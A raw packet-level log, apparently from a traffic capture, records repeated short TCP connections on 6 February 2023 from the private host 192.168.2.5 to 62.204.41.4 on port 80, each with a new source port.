                                                        Feb 6, 2023 14:17:49.692584991 CET4992080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:49.692974091 CET4992080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:49.694506884 CET804991962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:49.694667101 CET4991980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:49.753348112 CET804992062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:49.757086039 CET804992062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:49.757275105 CET4992080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:49.863230944 CET4992080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:49.864259958 CET4992180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:49.923902035 CET804992062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:49.924084902 CET4992080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:49.924489975 CET804992162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:49.926399946 CET4992180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:49.926933050 CET4992180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:49.987227917 CET804992162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:49.994590998 CET804992162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:49.998411894 CET4992180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.113272905 CET4992180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.114198923 CET4992280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.173754930 CET804992162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.174581051 CET804992262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.174712896 CET4992180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.174777031 CET4992280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.176453114 CET4992280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.236998081 CET804992262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.242876053 CET804992262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.243556976 CET4992280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.347130060 CET4992280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.348078012 CET4992380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.407850981 CET804992262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.409780979 CET804992362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.409912109 CET4992280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.409957886 CET4992380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.412938118 CET4992380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.474472046 CET804992362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.478907108 CET804992362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.479051113 CET4992380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.581688881 CET4992380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.582591057 CET4992480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.643372059 CET804992362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.643606901 CET4992380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.644809008 CET804992462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.645025969 CET4992480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.645406008 CET4992480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.707642078 CET804992462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.711787939 CET804992462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.711956978 CET4992480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.819015980 CET4992480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.828051090 CET4992580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.881413937 CET804992462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.881580114 CET4992480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.889482975 CET804992562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.889698982 CET4992580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.890187025 CET4992580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:50.951441050 CET804992562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.955138922 CET804992562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:50.955300093 CET4992580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.073904037 CET4992580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.074748993 CET4992680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.135274887 CET804992562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.135420084 CET4992580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.136977911 CET804992662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.137094021 CET4992680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.137579918 CET4992680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.200948954 CET804992662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.206058979 CET804992662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.206425905 CET4992680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.365343094 CET4992680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.366080046 CET4992780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.427572966 CET804992762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.427716017 CET804992662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.427737951 CET4992780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.427783012 CET4992680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.554248095 CET4992780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.615808964 CET804992762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.619070053 CET804992762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.619268894 CET4992780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.738435030 CET4992780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.739223957 CET4992880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.799611092 CET804992862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.799837112 CET4992880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.799979925 CET804992762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.800112963 CET4992780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.819639921 CET4992880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:51.880291939 CET804992862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.883795023 CET804992862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:51.883899927 CET4992880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.037024021 CET4992880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.038729906 CET4992980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.097630024 CET804992862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:52.097750902 CET4992880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.100286007 CET804992962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:52.100470066 CET4992980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.146320105 CET4992980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.212090015 CET804992962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:52.217864037 CET804992962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:52.218961954 CET4992980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.382518053 CET4993080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.382519007 CET4992980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.442224026 CET804993062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:52.442389965 CET4993080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:52.444072008 CET804992962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:52.446116924 CET4992980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.103784084 CET4993080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.163446903 CET804993062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.168404102 CET804993062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.170490026 CET4993080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.340254068 CET4993080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.341177940 CET4993180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.399980068 CET804993062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.400669098 CET4993080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.403630018 CET804993162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.404401064 CET4993180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.428937912 CET4993180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.491539955 CET804993162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.494733095 CET804993162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.494882107 CET4993180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.628679037 CET4993180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.629446983 CET4993280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.690911055 CET804993262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.691492081 CET804993162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.691616058 CET4993180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.692349911 CET4993280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.704513073 CET4993280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:53.764394045 CET804993262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.767765999 CET804993262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:53.768002033 CET4993280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:54.464711905 CET4993380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:54.465029955 CET4993280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:54.524586916 CET804993262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:54.524801970 CET4993280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:54.525281906 CET804993362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:54.525439978 CET4993380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:54.746192932 CET4993380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:54.806961060 CET804993362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:54.813713074 CET804993362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:54.813795090 CET4993380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:54.979055882 CET4993380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:54.979842901 CET4993480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.040124893 CET804993362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.040292978 CET4993380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.042268991 CET804993462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.042422056 CET4993480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.067276001 CET4993480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.130013943 CET804993462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.136074066 CET804993462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.136240005 CET4993480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.297511101 CET4993480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.298222065 CET4993580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.358922005 CET804993562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.359101057 CET4993580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.359900951 CET804993462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.359992981 CET4993480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.397933006 CET4993580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.458668947 CET804993562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.461610079 CET804993562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.461781979 CET4993580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.612915993 CET4993580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.613979101 CET4993680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.673680067 CET804993562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.673783064 CET4993580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.675386906 CET804993662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.675513983 CET4993680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.677694082 CET4993680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.739358902 CET804993662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.744800091 CET804993662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.745016098 CET4993680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.852178097 CET4993780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.852555990 CET4993680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.912942886 CET804993762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.913140059 CET4993780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.913688898 CET4993780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.913914919 CET804993662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.914104939 CET4993680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:55.973961115 CET804993762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.976597071 CET804993762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:55.976758003 CET4993780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.081955910 CET4993780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.082865953 CET4993880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.142462015 CET804993762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.142725945 CET4993780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.145313025 CET804993862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.145493984 CET4993880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.145927906 CET4993880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.208209991 CET804993862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.213244915 CET804993862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.213413954 CET4993880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.317179918 CET4993880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.318515062 CET4993980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.379275084 CET804993962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.379487991 CET4993980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.379523039 CET804993862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.379615068 CET4993880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.379898071 CET4993980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.440483093 CET804993962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.443176031 CET804993962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.443332911 CET4993980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.551317930 CET4993980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.552283049 CET4994080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.611931086 CET804993962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.612087965 CET4993980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.612607002 CET804994062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.612728119 CET4994080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.613135099 CET4994080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.673667908 CET804994062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.676527023 CET804994062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.676708937 CET4994080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.786881924 CET4994080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.787909031 CET4994180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.847696066 CET804994062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.847847939 CET4994080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.849294901 CET804994162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.849706888 CET4994180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.852297068 CET4994180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:56.913721085 CET804994162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.916233063 CET804994162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:56.916683912 CET4994180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.020015001 CET4994180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.021004915 CET4994280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.081458092 CET804994162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.082319975 CET4994180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.083205938 CET804994262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.083365917 CET4994280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.083817959 CET4994280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.146070004 CET804994262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.152782917 CET804994262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.152951956 CET4994280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.282752037 CET4994280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.283514023 CET4994380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.343867064 CET804994362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.343964100 CET4994380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.345042944 CET804994262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.345124960 CET4994280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.392401934 CET4994380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.452764988 CET804994362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.457815886 CET804994362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.458025932 CET4994380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.567167044 CET4994380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.568051100 CET4994480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.627631903 CET804994362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.627809048 CET4994380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.628314972 CET804994462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.628463030 CET4994480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.633328915 CET4994480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.693931103 CET804994462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.696747065 CET804994462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.696872950 CET4994480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.802381992 CET4994480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.803373098 CET4994580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.863099098 CET804994462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.863249063 CET4994480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.865782976 CET804994562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.865914106 CET4994580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.866705894 CET4994580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:57.929044008 CET804994562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.932298899 CET804994562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:57.932461023 CET4994580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.052349091 CET4994580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.053075075 CET4994680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.114433050 CET804994662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.114720106 CET4994680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.114765882 CET804994562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.114857912 CET4994580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.119194984 CET4994680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.180613995 CET804994662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.185362101 CET804994662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.185492039 CET4994680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.301071882 CET4994680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.301881075 CET4994780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.362184048 CET804994762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.362386942 CET804994662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.362423897 CET4994780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.362462044 CET4994680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.363275051 CET4994780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.423508883 CET804994762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.427375078 CET804994762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.427475929 CET4994780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.537921906 CET4994780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.538526058 CET4994880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.598464012 CET804994762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.599167109 CET4994780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.599869967 CET804994862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.600033045 CET4994880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.606494904 CET4994880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.668018103 CET804994862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.671230078 CET804994862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.675139904 CET4994880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.785895109 CET4994880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.786799908 CET4994980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.847496986 CET804994862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.848164082 CET804994962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.848321915 CET4994880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.848380089 CET4994980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.849591017 CET4994980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:58.911056042 CET804994962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.914136887 CET804994962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:58.919151068 CET4994980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.042300940 CET4994980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.043171883 CET4995080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.102619886 CET804995062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.103780031 CET804994962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.103990078 CET4994980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.104526997 CET4995080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.104526997 CET4995080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.163980007 CET804995062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.169317961 CET804995062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.174184084 CET4995080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.285558939 CET4995080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.286578894 CET4995180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.346014977 CET804995062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.347207069 CET4995080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.348993063 CET804995162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.351211071 CET4995180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.351610899 CET4995180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.413969040 CET804995162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.418251038 CET804995162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.418814898 CET4995180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.546293974 CET4995180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.549717903 CET4995280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.608784914 CET804995162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.608928919 CET4995180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.609071970 CET804995262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.609170914 CET4995280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.609623909 CET4995280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.669070005 CET804995262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.671968937 CET804995262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.672152042 CET4995280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.788455009 CET4995280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.789135933 CET4995380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.848021030 CET804995262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.848165035 CET4995280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.850379944 CET804995362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.850523949 CET4995380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.850997925 CET4995380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:59.912341118 CET804995362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.914640903 CET804995362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:59.914758921 CET4995380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.021588087 CET4995380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.022433996 CET4995480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.082078934 CET804995462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.082218885 CET4995480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.082619905 CET4995480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.083097935 CET804995362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.083193064 CET4995380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.142074108 CET804995462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.146924019 CET804995462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.147089958 CET4995480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.254257917 CET4995480192.168.2.562.204.41.4
